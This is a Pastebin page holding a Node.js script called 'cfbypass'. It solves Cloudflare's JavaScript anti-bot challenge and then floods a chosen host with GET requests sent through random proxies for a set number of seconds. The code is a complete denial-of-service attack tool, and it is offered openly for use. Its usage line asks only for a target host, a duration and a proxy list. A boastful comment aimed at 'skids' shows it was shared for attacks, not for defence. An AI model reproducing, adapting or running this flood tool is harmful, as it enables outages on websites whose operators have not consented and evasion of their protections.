API tools faq
paste
Advertisement
Guest User

cfbypass [cloudflare bypass JAVAscript (nodejs)]

a guest
Jan 4th, 2019
4,950
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.13 KB | None | 0 0
raw download clone embed print report
  1. /**
  2. // For all those skids leaking the first Version when its not even bypassing lol
  3. // Usage : node cfbypass [host] [time] [list.txt (Your proxy list)]
  4. //Credits :
  5. // Humanity#0001 [Nuke.gg]
  6. // Serpico#3082
  7. */
  8. process.on('uncaughtException', (err) => {});
  9. process.on('unhandledRejection', (err) => {});
  10. var vm = require('vm');
  11. var requestModule = require('request');
  12. var jar = requestModule.jar();
  13. var fs = require('fs');
  14. var proxies = fs.readFileSync(process.argv[4], 'utf-8').replace(/\r/g, '').split('\n');
  15.  
  16. function arrremove(arr, what) {
  17. var found = arr.indexOf(what);
  18.  
  19. while (found !== -1) {
  20. arr.splice(found, 1);
  21. found = arr.indexOf(what);
  22. }
  23. }
  24.  
  25. var request = requestModule.defaults({
  26. jar: jar
  27. }),
  28. UserAgent = 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',
  29. Timeout = 6000,
  30. WAF = true,
  31. cloudscraper = {};
  32.  
  33.  
  34.  
  35. var cookies = [];
  36.  
  37. cloudscraper.get = function(url, callback, headers) {
  38. performRequest({
  39. method: 'GET',
  40. url: url,
  41. headers: headers
  42. }, callback);
  43. };
  44.  
  45. cloudscraper.post = function(url, body, callback, headers) {
  46. var data = '',
  47. bodyType = Object.prototype.toString.call(body);
  48.  
  49. if (bodyType === '[object String]') {
  50. data = body;
  51. } else if (bodyType === '[object Object]') {
  52. data = Object.keys(body).map(function(key) {
  53. return key + '=' + body[key];
  54. }).join('&');
  55. }
  56.  
  57. headers = headers || {};
  58. headers['Content-Type'] = headers['Content-Type'] || 'application/x-www-form-urlencoded; charset=UTF-8';
  59. headers['Content-Length'] = headers['Content-Length'] || data.length;
  60.  
  61. performRequest({
  62. method: 'POST',
  63. body: data,
  64. url: url,
  65. headers: headers
  66. }, callback);
  67. }
  68.  
  69. cloudscraper.request = function(options, callback) {
  70. performRequest(options, callback);
  71. }
  72.  
  73. function performRequest(options, callback) {
  74. var method;
  75. options = options || {};
  76. options.headers = options.headers || {};
  77.  
  78. options.headers['Cache-Control'] = options.headers['Cache-Control'] || 'private';
  79. options.headers['Accept'] = options.headers['Accept'] || 'application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5';
  80.  
  81. makeRequest = requestMethod(options.method);
  82.  
  83. if ('encoding' in options) {
  84. options.realEncoding = options.encoding;
  85. } else {
  86. options.realEncoding = 'utf8';
  87. }
  88. options.encoding = null;
  89.  
  90. if (!options.url || !callback) {
  91. throw new Error('To perform request, define both url and callback');
  92. }
  93.  
  94. options.headers['User-Agent'] = options.headers['User-Agent'] || UserAgent;
  95.  
  96. makeRequest(options, function(error, response, body) {
  97. var validationError;
  98. var stringBody;
  99.  
  100. if (error || !body || !body.toString) {
  101. return callback({
  102. errorType: 0,
  103. error: error
  104. }, body, response);
  105. }
  106.  
  107. stringBody = body.toString('utf8');
  108.  
  109. if (validationError = checkForErrors(error, stringBody)) {
  110. return callback(validationError, body, response);
  111. }
  112.  
  113. if (stringBody.indexOf('a = document.getElementById(\'jschl-answer\');') !== -1) {
  114. setTimeout(function() {
  115. return solveChallenge(response, stringBody, options, callback);
  116. }, Timeout);
  117. } else if (stringBody.indexOf('You are being redirected') !== -1 ||
  118. stringBody.indexOf('sucuri_cloudproxy_js') !== -1) {
  119. setCookieAndReload(response, stringBody, options, callback);
  120. } else {
  121. processResponseBody(options, error, response, body, callback);
  122. }
  123. });
  124. }
  125.  
  126. function checkForErrors(error, body) {
  127. var match;
  128.  
  129. if (error) {
  130. return {
  131. errorType: 0,
  132. error: error
  133. };
  134. }
  135.  
  136. if (body.indexOf('why_captcha') !== -1 || /cdn-cgi\/l\/chk_captcha/i.test(body)) {
  137. return {
  138. errorType: 1
  139. };
  140. }
  141.  
  142. match = body.match(/<\w+\s+class="cf-error-code">(.*)<\/\w+>/i);
  143.  
  144. if (match) {
  145. return {
  146. errorType: 2,
  147. error: parseInt(match[1])
  148. };
  149. }
  150.  
  151. return false;
  152. }
  153.  
  154.  
  155. function solveChallenge(response, body, options, callback) {
  156. var challenge = body.match(/name="jschl_vc" value="(\w+)"/),
  157. host = response.request.host,
  158. makeRequest = requestMethod(options.method),
  159. jsChlVc,
  160. answerResponse,
  161. answerUrl;
  162.  
  163. if (!challenge) {
  164. return callback({
  165. errorType: 3,
  166. error: 'I cant extract challengeId (jschl_vc) from page'
  167. }, body, response);
  168. }
  169.  
  170. jsChlVc = challenge[1];
  171.  
  172. challenge = body.match(/getElementById\('cf-content'\)[\s\S]+?setTimeout.+?\r?\n([\s\S]+?a\.value =.+?)\r?\n/i);
  173.  
  174. if (!challenge) {
  175. return callback({
  176. errorType: 3,
  177. error: 'I cant extract method from setTimeOut wrapper'
  178. }, body, response);
  179. }
  180.  
  181. challenge_pass = body.match(/name="pass" value="(.+?)"/)[1];
  182.  
  183. challenge = challenge[1];
  184.  
  185. challenge = challenge.replace(/a\.value =(.+?) \+ .+?;/i, '$1');
  186.  
  187. challenge = challenge.replace(/\s{3,}[a-z](?: = |\.).+/g, '');
  188. challenge = challenge.replace(/'; \d+'/g, '');
  189.  
  190. try {
  191. answerResponse = {
  192. 'jschl_vc': jsChlVc,
  193. 'jschl_answer': (eval(challenge) + response.request.host.length),
  194. 'pass': challenge_pass
  195. };
  196. } catch (err) {
  197. return callback({
  198. errorType: 3,
  199. error: 'Error occurred during evaluation: ' + err.message
  200. }, body, response);
  201. }
  202.  
  203. answerUrl = response.request.uri.protocol + '//' + host + '/cdn-cgi/l/chk_jschl';
  204.  
  205. options.headers['Referer'] = response.request.uri.href;
  206. options.url = answerUrl;
  207. options.qs = answerResponse;
  208.  
  209. makeRequest(options, function(error, response, body) {
  210.  
  211. if (error) {
  212. return callback({
  213. errorType: 0,
  214. error: error
  215. }, response, body);
  216. }
  217.  
  218. if (response.statusCode === 302) {
  219. options.url = response.headers.location;
  220. delete options.qs;
  221. makeRequest(options, function(error, response, body) {
  222. processResponseBody(options, error, response, body, callback);
  223. });
  224. } else {
  225. processResponseBody(options, error, response, body, callback);
  226. }
  227. });
  228. }
  229.  
  230. function setCookieAndReload(response, body, options, callback) {
  231. var challenge = body.match(/S='([^']+)'/);
  232. var makeRequest = requestMethod(options.method);
  233.  
  234. if (!challenge) {
  235. return callback({
  236. errorType: 3,
  237. error: 'I cant extract cookie generation code from page'
  238. }, body, response);
  239. }
  240.  
  241. var base64EncodedCode = challenge[1];
  242. var cookieSettingCode = new Buffer(base64EncodedCode, 'base64').toString('ascii');
  243.  
  244. var sandbox = {
  245. location: {
  246. reload: function() {}
  247. },
  248. document: {}
  249. };
  250. vm.runInNewContext(cookieSettingCode, sandbox);
  251. try {
  252. cookies.push(sandbox.document.cookie);
  253. jar.setCookie(sandbox.document.cookie, response.request.uri.href, {
  254. ignoreError: true
  255. });
  256. } catch (err) {
  257. return callback({
  258. errorType: 3,
  259. error: 'Error occurred during evaluation: ' + err.message
  260. }, body, response);
  261. }
  262.  
  263. makeRequest(options, function(error, response, body) {
  264. if (error) {
  265. return callback({
  266. errorType: 0,
  267. error: error
  268. }, response, body);
  269. }
  270. processResponseBody(options, error, response, body, callback);
  271. });
  272. }
  273.  
  274. function requestMethod(method) {
  275. method = method.toUpperCase();
  276.  
  277. return method === 'POST' ? request.post : request.get;
  278. }
  279.  
  280. function processResponseBody(options, error, response, body, callback) {
  281. if (typeof options.realEncoding === 'string') {
  282. body = body.toString(options.realEncoding);
  283. if (validationError = checkForErrors(error, body)) {
  284. return callback(validationError, response, body);
  285. }
  286. }
  287.  
  288.  
  289. callback(error, response, body);
  290. }
  291.  
  292. var ATTACK = {
  293. cfbypass(method, url, proxy) {
  294. performRequest({
  295. method: method,
  296. proxy: 'http://' + proxy,
  297. url: url
  298. }, function(err, response, body) {
  299. console.log(err, response.statusCode); // Remove this line if you dont want to see the output of ur request madafaka
  300. });
  301. }
  302. }
  303.  
  304. setTimeout(function() {
  305. process.exit(1);
  306. }, process.argv[3] * 1000);
  307.  
  308. setInterval(function() {
  309. ATTACK.cfbypass('GET', process.argv[2], proxies[Math.floor(Math.random() * proxies.length)]);
  310. });
  311.  
  312. console.log("GET Test has been sent to %s for %s seconds", process.argv[2], process.argv[3]);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!